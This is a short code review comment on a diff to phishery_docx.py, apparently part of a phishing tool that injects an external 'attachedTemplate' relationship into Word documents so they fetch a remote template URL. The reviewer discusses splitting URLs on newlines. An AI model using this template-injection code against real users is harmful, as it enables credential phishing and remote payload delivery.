client/phishery_docx.py

```diff
@@ -18,45 +23,74 @@ def path_is_doc_file(path):
 	return True
 
 def phishery_inject(input_file, https_url, output_file=None):
+	target_string = '<Relationship Id="{rid}" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="{target_url}" TargetMode="External"/>'
 	input_file = os.path.abspath(input_file)
-	patches = {}
-	rid = 'rId' + str(random.randint(10000, 99999))
+	https_urls = https_url.split()
```

Comment:
I think this should be more specifically `https_url.split('\n')` so you're only splitting on the newline. Each URL should then be `.strip()`'ed of leading and trailing whitespace, however whitespace in the URL should be encoded as necessary or an error should be thrown, but what I don't want is for a URL like `http://myserver/This Cool Document.dotm` to end up being multiple URLs.